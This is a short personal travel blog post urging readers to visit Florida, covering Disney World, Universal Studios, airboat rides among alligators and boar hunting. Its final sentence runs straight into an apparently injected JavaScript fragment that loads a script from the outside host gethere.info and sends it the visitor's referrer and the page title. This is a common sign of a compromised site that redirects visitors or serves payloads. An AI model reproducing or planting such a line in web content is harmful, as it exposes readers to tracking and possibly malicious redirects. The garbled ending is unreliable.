What Will Your Destination Be?

Summer vacation is a time for swimming, sun and fun. One question everyone seems to ask – “Where should I go.”

There are so many choices: California, Hawaii, and even Texas. How about instead you travel approximately 1800 miles east to Florida! It has beaches, Disney World and Universal Studios – Orlando, which also includes the separate Harry Potter theme park. I went to Florida for my high school graduation and I absolutely loved it. The only thing that got to me was the humidity. Being an Arizonan, I didn’t fare well in the “wet” heat. Expect to sweat, and drink plenty of water because with a myriad of options for fun you’re going to be spending lots of time outside! This is because both Disney World and Universal Studios are much more expansive than their Californian counterparts and, in my opinion, much better.

While in Florida you may have the opportunity to take a riverboat ride and see the alligators. It was a relaxing and exhilarating experience that I would recommend anyone and everyone to try. You may bump some of them on the back while you are going down the river, but do not fret, as the boats are made with a coating that leaves the alligators unharmed. Be prepared to get wet, because the airboat has no cover to protect you from the elements.

If you are a hunter, then you may want to look into the excellent boar hunting that Florida offers. After filling out the proper paperwork and fees, you will be on your way! I have not gone boar hunting as of yet but, according to our captain, it is an experience you won’t soon forget.

Some fun facts about Florida include: it is the largest citrus producer in the United States. Also, if you can believe it, Florida is the only place in the world where alligators and crocodiles co-exist.

So from my experience to yours, I hope you choose to visit the Sunshine state. As always, have fun, be safe, and keep someone informed of where you are and when you plan on returning.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
